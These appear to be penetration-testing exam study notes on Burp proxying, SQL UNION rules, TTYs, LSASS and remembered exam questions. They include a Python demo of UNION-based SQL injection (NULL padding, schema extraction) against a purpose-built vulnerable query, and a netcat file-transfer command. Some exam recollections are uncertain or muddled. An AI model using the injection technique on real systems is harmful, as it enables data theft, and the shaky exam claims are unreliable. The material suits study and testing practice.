 Thick clients: if the application sends HTTP, it can be intercepted with Burp using the invisible proxy option under Proxy Listeners (used when the client cannot be given proxy settings and is instead pointed at Burp through a hosts-file or DNS entry). Echo Mirage and Canape are similar tools designed for thick clients.
 tcpdump or Wireshark can also be used when the traffic is not HTTP, such as FTP.

UNION Statement
The UNION operator combines the result sets of two or more SELECT statements.
 Each SELECT within the UNION must return the same number of columns (the two sides must be balanced; in UNION-based SQL injection this is the rule the tester satisfies by padding with NULL until the column-count error disappears)
 The columns must have compatible data types
 The columns in each SELECT must be in the same order
SELECT City FROM Customers UNION SELECT City FROM Suppliers ORDER BY City;
In the above example Customers and Suppliers are the tables and City is the column. Because of the balancing rule you cannot, for example, write:
SELECT City, PostalCode FROM Customers UNION SELECT City FROM Suppliers ORDER BY City;

TTY
"tty" originally meant "teletype" and "pty" means "pseudo-teletype". In UNIX, /dev/tty* is any device that acts like a teletype, i.e. a terminal (so called because teletypes were the terminals of the day). The tty command in Linux and other Unix-like operating systems prints the name of the terminal attached to standard input; in a script it is used to determine whether the script is talking to a terminal (an interactive user) or to some other destination such as another program or a printer.

Password Only Login Prompt
A login that asks for a password only, with no username, suggests a Cisco IOS device: a console or vty line configured with login and a line password (rather than login local) prompts this way.

Windows LSASS
Local Security Authority Subsystem Service (LSASS) is the process in Microsoft Windows that enforces the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes and creates access tokens. Because it holds the credential material of logged-on users in memory, lsass.exe is the process that credential-dumping tools target.

Notes:
 What is Oracle and PL/SQL? In Oracle database management, PL/SQL is a procedural language extension to Structured Query Language (SQL).
The purpose of PL/SQL is to combine a database language with a procedural programming language.
 STP:
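Returning to the UNION Statement section above, here is an added example (not from the original notes) that runs the balancing rules against a real engine, sqlite3 from the Python standard library. It recreates the Customers/Suppliers tables with invented rows, shows the balanced one-column UNION and the error the two-column version produces, and then applies the same rule the way a tester does against a hypothetical injectable query: padding UNION SELECT with NULL until the column count matches, and then using a free slot to pull table names out of the schema.

```python
"""UNION balancing rules demonstrated with sqlite3.

Added example for the UNION notes; not from the original page. The tables,
rows and the deliberately injectable query are constructed for illustration.
"""
import sqlite3
from typing import List, Optional


def setup() -> sqlite3.Connection:
    """In-memory copy of the Customers/Suppliers tables from the notes (rows invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Customers (CustomerID INTEGER, City TEXT, PostalCode TEXT);
        CREATE TABLE Suppliers (SupplierID INTEGER, City TEXT);
        INSERT INTO Customers VALUES (1, 'London', 'EC1A'), (2, 'Leeds', 'LS1'), (3, 'London', 'SW1A');
        INSERT INTO Suppliers VALUES (10, 'Leeds'), (11, 'Bristol');
    """)
    return conn


def union_cities(conn: sqlite3.Connection) -> List[str]:
    """The balanced UNION from the notes: one column per side, duplicates collapsed, sorted."""
    rows = conn.execute(
        "SELECT City FROM Customers UNION SELECT City FROM Suppliers ORDER BY City"
    ).fetchall()
    return [city for (city,) in rows]


def try_union(conn: sqlite3.Connection, sql: str) -> Optional[str]:
    """None if the engine accepts the statement, otherwise its error message."""
    try:
        conn.execute(sql).fetchall()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


# Hypothetical vulnerable query: the id is pasted straight into the SQL text.
VULNERABLE_QUERY = "SELECT CustomerID, City, PostalCode FROM Customers WHERE CustomerID = {id}"


def lookup_customer(conn: sqlite3.Connection, user_input: str) -> list:
    """Runs the injectable query exactly as a careless application would."""
    return conn.execute(VULNERABLE_QUERY.format(id=user_input)).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> int:
    """The tester's NULL-padding walk: UNION SELECT NULL, NULL, ... grows by one
    column per probe until the column-count error stops, revealing how many
    columns the original SELECT returns. NULL is used because it is compatible
    with every column type, which satisfies the second UNION rule on strict engines."""
    for n in range(1, max_cols + 1):
        payload = "1 UNION SELECT " + ", ".join(["NULL"] * n) + "-- "
        try:
            lookup_customer(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("no column count up to %d matched" % max_cols)


def extract_table_names(conn: sqlite3.Connection) -> List[str]:
    """With the count known, put a real column into one slot and read schema data
    through the original query's result set (sqlite_master here; other engines
    expose information_schema or sysobjects)."""
    n = find_column_count(conn)
    slots = ["NULL"] * n
    slots[1] = "name"  # the City position, a text slot
    payload = "1 UNION SELECT " + ", ".join(slots) + " FROM sqlite_master WHERE type = 'table'-- "
    rows = lookup_customer(conn, payload)
    # Rows contributed by the injected SELECT carry NULL in the padded slots.
    return sorted(row[1] for row in rows if row[0] is None)


if __name__ == "__main__":
    db = setup()
    print("balanced:", union_cities(db))
    print("unbalanced:", try_union(
        db, "SELECT City, PostalCode FROM Customers UNION SELECT City FROM Suppliers ORDER BY City"))
    print("columns:", find_column_count(db))
    print("tables:", extract_table_names(db))
```

sqlite is loosely typed, so it does not enforce the data-type rule; on MSSQL, Oracle or PostgreSQL a type clash in a slot produces a conversion error, which is why a tester probes with NULL first and then tries a string literal in each slot to find one that will display text.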
To add from passing exam:
 PING with record-route – which header is updated – I put IP header
 ARP – WHO HAS broadcast
 DNS zone transfer port (TCP 53)
 .NET machine.config – input validation
 Unix password management – list of crypto algorithms – asks which one is not used – selected MD4
 TCP initial sequence – get no reply from a TCP connection
 ECB encryption
 TCP 2301? – Which OS? (MacOS listed also…)
 Netcat file transfer – only logical one was using type file.txt | nc targethost – from notes this makes no sense, but was the only one it could have been?
 Netcat -u for UDP port listening?
 MS tracert uses ICMP and UNIX traceroute uses UDP – confirm?
 In traceroute how do you know the host has been reached – host will send port unreachable
 NFS share with root squash – lists 3 files with various UIDs and GIDs (some 0 for root?) – asks which one can be changed by messing about…
 MS SQL – output of a string which it says is a password – asks which field has the salt, but not separated by $ so makes no sense?
 Well-configured Checkpoint FW on same LAN, will it respond to layer 2 ARP?
 Get port numbers of Real Time Protocol – RTP
 Tried to confuse you – REMOVE – it is not a valid HTTP method.
 What is an SSL downgrade attack?
 You download a webpage – so it's HTML over HTTP over SSL
 Organisation element of MAC address – first 2 bytes, 4 bytes?
 Where is the SA password stored, in the Master DB – which table? Does MS SQL use .. for example master..syslogin?
 TCP wrapper – permit and deny file names?
 Msbin1 encoding – used for what, plaintext?
 Linux /opt folder with PDF listing. HTTP parameter set to it to browse – Linux host and possible directory traversal attacks...
 ESP is part of IPsec, which runs on UDP 500. A packet sent to it will elicit a UDP response of nothing... you put it'll get a TCP response...
 HTTP request smuggling
 Parameters should only be in POST, not GET?
 SIP configuration file, SIP Referer header?
 (2) Client-side certificate being issued, then configured for proxy for web app testing?
 .NET machine.config
 .NET input validation